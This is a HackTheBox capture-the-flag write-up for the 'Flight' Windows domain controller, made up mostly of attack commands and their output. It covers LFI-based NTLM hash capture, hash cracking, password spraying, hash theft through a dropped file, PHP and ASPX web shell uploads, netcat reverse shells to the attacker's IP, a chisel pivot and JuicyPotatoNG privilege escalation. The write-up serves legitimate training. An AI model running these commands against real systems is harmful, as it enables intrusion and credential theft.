HTB - Flight

Machine Info

Flight is a hard Windows machine that starts with a website with two different virtual hosts. One of them is vulnerable to LFI and allows an attacker to retrieve an NTLM hash. Once cracked, the obtained clear text password will be sprayed across a list of valid usernames to discover a password re-use scenario. Once the attacker has SMB access as the user s.moon he is able to write to a share that gets accessed by other users. Certain files can be used to steal the NTLMv2 hash of the users that access the share. Once the second hash is cracked the attacker will be able to write a reverse shell in a share that hosts the web files and gain a shell on the box as low privileged user. Having credentials for the user c.bum, it will be possible to gain a shell as this user, which will allow the attacker to write an aspx web shell on a web site configured to listen only on localhost. Once the attacker has command execution as the Microsoft Virtual Account, he is able to run Rubeus to get a ticket for the machine account that can be used to perform a DCSync attack ultimately obtaining the hashes for the Administrator user or abuse SeImpersonatePrivilege privilege to gain SYSTEM account.

Enumeration

---

Scope

IP Address: 10.10.11.187

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
389/tcp  open  ldap             syn-ack
445/tcp  open  microsoft-ds     syn-ack
464/tcp  open  kpasswd5         syn-ack
593/tcp  open  http-rpc-epmap   syn-ack
636/tcp  open  ldapssl          syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack
9389/tcp open  adws             syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap  -sU -p1-10000 --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE
53/udp  open  domain
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
80/tcp   open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-20 10:26:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-20T10:28:25
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m03s

* Open ports:53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP open ports: 53,389
* Services: DNS - HTTP - KERBEROS - RPC - SMB - LDAP - LDAPS - winRM
* Versions: Apache httpd 2.4.52 - PHP/8.1.1
* Important notes: Domain: flight.htb

I started to collect subdomain of the webapp since there is web server listening on port 80

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Hos
t: FUZZ.flight.htb" -fs 7069                                                                                        

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev

school     [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 113ms] 

Update /etc/hosts file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo sh -c "echo  '$ip flight.htb school.flight.htb' >> /etc/hosts"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ tail -n1 /etc/hosts
10.10.11.187 flight.htb school.flight.ht

DNS Enumeration

I tried to transfer zone from DNS but nothing

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ dig axfr flight.htb @$ip                                 

; <<>> DiG 9.19.19-1-Debian <<>> axfr flight.htb @10.10.11.187
;; global options: +cmd
; Transfer failed.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ dig axfr school.flight.htb @$ip

; <<>> DiG 9.19.19-1-Debian <<>> axfr school.flight.htb @10.10.11.187
;; global options: +cmd
; Transfer failed.

RPC Enumeration

Access denied in rpc

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ rpcclient -U '%' $ip

rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED

SMB Enumeration

Nothing also from smb

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ smbclient -N -L //$ip                                                    

Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.187 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ crackmapexec smb $ip -u '' -p '' --shares                               

SMB   10.10.11.187    445    G0    [+] flight.htb\: 
SMB   10.10.11.187    445    G0    [-] Error enumerating shares: STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares

SMB    10.10.11.187    445    G0    [-] flight.htb\guest: STATUS_ACCOUNT_DISABLED 

KERBEROS Enumeration

I started kerbrute to get at least valid usernames but with no luck.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/MultiMasters]
└─$ kerbrute userenum --dc $ip -d flight.htb -t 100 /usr/share/wordlists/seclists/Usernames/jsmith.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

2024/07/19 23:40:57 >  Done! Tested 48705 usernames (0 valid) in 51.969 seconds

LDAP Enumeration

No info from ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ldapsearch -H ldap://$ip -x -b "DC=FLIGHT,DC=HTB" -s sub '*'

search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

HTTP Enumeration

http://10.10.11.187/

It's a static website and when fuzzing directory, I didn't find anything, So I went to explore school.flight.htb subdomain I found before.

http://school.flight.htb/

Shell as svc_apache

The webapp includes files in view parameter http://school.flight.htb/index.php?view=about.html

I tried to include local file with these payloads but without luck:

C:\Windows\System32\drivers\etc\hosts
..\..\..\Windows\System32\drivers\etc\hosts
./../../../Windows/System32/drivers/etc/hosts

However, C:/windows/system32/drivers/etc/hosts worked

I thought it's worth nothing to test for RFI, So I started a local smb server and visit /index.php?view=///10.10.16.7/share, then I got a NTLMv2 hash

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-smbserver -smb2support share .                                                              
[*] Incoming connection (10.10.11.187,49850)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:d3295ba0f2fcade30868dfa24d5af590:01010000000000000045524d5adada0188255a12d3e6c00100000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e0068004300070008000045524d5adada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000

The hash was cracked successfully

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt 

SVC_APACHE::flight:aaaaaaaaaaaaaaaa:d3295ba0f2fcade30868dfa24d5af590:01010000000000000045524d5adada0188255a12d3e6c00100000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e0068004300070008000045524d5adada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:S@Ss!K@*t13

Session..........: hashcat
Status...........: Cracked

• After getting valid credentials, I will do the following:

  • Explore the shares for interesting files with spider_plus module with CME

  • Enumerate the domain with rpcclient & bloodhound.py

bloodhound.py

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ bloodhound-python -u 'svc_apache' -p 'S@Ss!K@*t13' -ns $ip -d flight.htb -c all --zip

<snip>
INFO: Done in 00M 14S
INFO: Compressing output into 20240720003141_bloodhound.zip

rpcclient to get domain users

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rpcclient -U 'svc_apache%S@Ss!K@*t13' $ip -c enumdomusers | tee -a users.txt
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[S.Moon] rid:[0x642]
user:[R.Cold] rid:[0x643]
user:[G.Lors] rid:[0x644]
user:[L.Kein] rid:[0x645]
user:[M.Gold] rid:[0x646]
user:[C.Bum] rid:[0x647]
user:[W.Walker] rid:[0x648]
user:[I.Francis] rid:[0x649]
user:[D.Truff] rid:[0x64a]
user:[V.Stevens] rid:[0x64b]
user:[svc_apache] rid:[0x64c]
user:[O.Possum] rid:[0x64d]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ cat users.txt | cut -d\[ -f2 | cut -d\] -f1  | tee -a users.lst
Administrator
Guest
krbtgt
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
svc_apache
O.Possum

I tried ASREPROASTING against these users but no luck :(

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-GetNPUsers FLIGHT.HTB/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst

<snip>
[-] User C.Bum doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User W.Walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User I.Francis doesn't have UF_DONT_REQUIRE_PREAUTH set
<snip>

I tried then to spray the password of the user svc_apache and see if it's reused by another user

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u users.lst  -p 'S@Ss!K@*t13' --continue-on-success
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE 

I found no interesting files when enumerating the shares as svc_apache, So I tried to enumerate them with S.Moon

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u 'svc_apache' -p 'S@Ss!K@*t13' --shares

SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB         10.10.11.187    445    G0               [+] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share
SMB         10.10.11.187    445    G0               Shared          READ
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share
SMB         10.10.11.187    445    G0               Users           READ
SMB         10.10.11.187    445    G0               Web             READ  

S.Moon has write access the Shared share folder, So I can but a malicious .scf or .lnk files to get NTLMv2 of the user that enter that share

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u S.Moon -p 'S@Ss!K@*t13' --shares

SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [+] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ
SMB         10.10.11.187    445    G0               Web             READ   

I mounted the Shared folder to my kali machine for easy exploring

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo mount -t cifs "\\\\$ip\\Shared" ./shared -o "username=S.Moon,password=S@Ss\!K@*t13" 

I tried to drop multiple files but it seems like there is a group policy that prevent specific file extensions

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.scf
touch: cannot touch 'file.scf': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.lnk
touch: cannot touch 'file.lnk': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.ico

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.exe
touch: cannot touch 'file.exe': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.bat
touch: cannot touch 'file.bat': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.dll
touch: cannot touch 'file.dll': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.txt
touch: cannot touch 'file.txt': Permission denied

┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.ini

Shell as c.bum

.ico & .ini worked for me, So I used this post to create .ini file as I don't know the structure that should be written with

Places of Interest in Stealing NetNTLM Hashes🔐Blog of Osanda

There is also a tool that can create multiple files that can be dropped:

https://github.com/Greenwolf/ntlm_theft

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-smbserver -smb2support share . 

c.bum::flight.htb:aaaaaaaaaaaaaaaa:0839d9896fae8cd052b24e128b30c06e:010100000000000000e1714c63dada01369d55e739f507ca00000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e00680043000700080000e1714c63dada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt 

C.BUM::flight.htb:aaaaaaaaaaaaaaaa:0839d9896fae8cd052b24e128b30c06e:010100000000000000e1714c63dada01369d55e739f507ca00000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e00680043000700080000e1714c63dada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:Tikkycoll_431012284

Session..........: hashcat
Status...........: Cracked

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nxc smb $ip -u 'C.BUM' -p 'Tikkycoll_431012284'

SMB         10.10.11.187    445    G0               [+] flight.htb\C.BUM:Tikkycoll_431012284 
SMB         10.10.11.187    445    G0               Node C.BUM@FLIGHT.HTB successfully set as owned in BloodHound

C.BUM is a member of web development group, So I think it has a write permission on the web folder we saw before.

As I guessed :)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nxc smb $ip -u 'C.BUM' -p 'Tikkycoll_431012284' --shares

SMB         10.10.11.187    445    G0               [+] flight.htb\C.BUM:Tikkycoll_431012284 
SMB         10.10.11.187    445    G0               [*] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ
SMB         10.10.11.187    445    G0               Web             READ,WRITE 

I mounted the share as C.BUM user

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo mount -t cifs "\\\\$ip\\web" ./web -o 'username=C.BUM,password=Tikkycoll_431012284'

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ls -al web     
total 4
drwxr-xr-x 2 root root    0 Jul 20  2024 .
drwxrwxr-x 5 kali kali 4096 Jul 20 01:23 ..
drwxr-xr-x 2 root root    0 Jul 20  2024 flight.htb
drwxr-xr-x 2 root root    0 Jul 20  2024 school.flight.htb

I tried to put .php file and it worked, So I will then try to upload a webshell

┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# touch file.php   

┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# ls
about.html  blog.html  file.php  home.html  images  index.php  lfi.html  styles

┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# cp ..\p0wny.php .

http://school.flight.htb/p0wny.php

The webshell doesn't persist maybe there is a clean up script. I will upload nc.exe and send a shell to my kali machine

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50122
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\xampp\htdocs\school.flight.htb> 

I wanted to get a shell as C.Bum also, So I uploaded RunasCs.exe and send connection back to my kali machine

PS C:\users\Public> .\RunasCs.exe C.BUM Tikkycoll_431012284 Powershell -r 10.10.16.7:8443

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-58a5e$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2364 created in background.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 8443                                      
listening on [any] 8443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50150

PS C:\Windows\system32> whoami
flight\c.bum

Get the user flag

PS C:\Users\C.Bum> type Desktop\user.txt
ed94451f15400f9a656xxxxxxxxxxxxxxxx

User Flag: ed94451f15400f9axxxxxxxxxxxxx

Looking at listening ports, non-default port is there.

PS C:\Users\C.Bum> netstat -ano | findstr TCP[33/49227]

  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       5636
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       924
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       5636
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       924
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING       4            

Confirm webapp existence

PS C:\Users\C.Bum> curl http://127.0.0.1:8000 -UseBasicParsing

StatusCode        : 200
StatusDescription : OK
Content           : <!DOCTYPE html>
                    <html>
                        <head>
                            <meta charset="utf-8">
                            <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">                                                       

I will then map this port locally on my kali with Chisel

┌──(kali㉿kali)-[~/…/CPTS/Tools/Pivot/chisel]
└─$ ./chisel_1.9.1_linux_amd64 server -p 9001 --reverse
2024/07/20 02:22:44 server: Reverse tunnelling enabled
2024/07/20 02:22:44 server: Fingerprint zWfxqSWqKl2N1LrFVrpM+V7q9qqtfuYJ5NCiPneI7eM=
2024/07/20 02:22:44 server: Listening on http://0.0.0.0:9001

PS C:\users\Public> .\chisel.exe client 10.10.16.7:9001 R:8888:127.0.0.1:8000
.\chisel.exe client 10.10.16.7:9001 R:8888:localhost:8000
2024/07/20 06:23:04 client: Connecting to ws://10.10.16.7:9001
2024/07/20 06:23:05 client: Connected (Latency 64.1406ms)

Connected with windows machine

┌──(kali㉿kali)-[~/…/CPTS/Tools/Pivot/chisel]
└─$ ./chisel_1.9.1_linux_amd64 server -p 9001 --reverse

<snip>
2024/07/20 02:43:21 server: session#1: tun: proxy#R:8888=>8000: Listening

There is a webapp running on IIS 10.0

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nmap -p8888 localhost -sCV

PORT     STATE SERVICE VERSION
8888/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: Flight - Travel and Tour
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0

http://localhost:8888/

Shell as defaultapppool

PS C:\inetpub> dir

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        9/22/2022  12:24 PM                custerr
d-----        7/20/2024   6:57 AM                development
d-----        9/22/2022   1:08 PM                history
d-----        9/22/2022  12:32 PM                logs
d-----        9/22/2022  12:24 PM                temp
d-----        9/22/2022  12:28 PM                wwwroot 

There is development folder and C.BUM has full access on it

PS C:\inetpub> icacls development

development flight\C.Bum:(OI)(CI)(W)
<snip>

So, I can write a webshell to that folder.

https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx

I downloaded the shell to my kali and then uploaded it to the windows box

PS C:\inetpub\development> curl 10.10.16.7/cmd.aspx -o .\cmd.aspx

http://localhost:8888/cmd.aspx

Get a Shell

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...


PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool

Shell as Administrator

PS C:\Users\Public> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

<snip>
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

Since I have SeImpersonatePrivilege, I can escalate to SYSTEM using JoicyPotato-ng

Releases · antonioCoco/JuicyPotatoNGGitHub

PS C:\Users\Public> .\JuicyPotatoNG.exe -t * -p "C:\Users\Public\nc.exe" -a "10.10.16.7 5555 -e PowerShell"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50363

PS C:\> whoami
nt authority\system

PS C:\> type C:\Users\Administrator\Desktop\root.txt
a884480417f1f666bf6xxxxxxxxxxxxxx

Root Flag: a884480417f1f666xxxxxxxxxxxx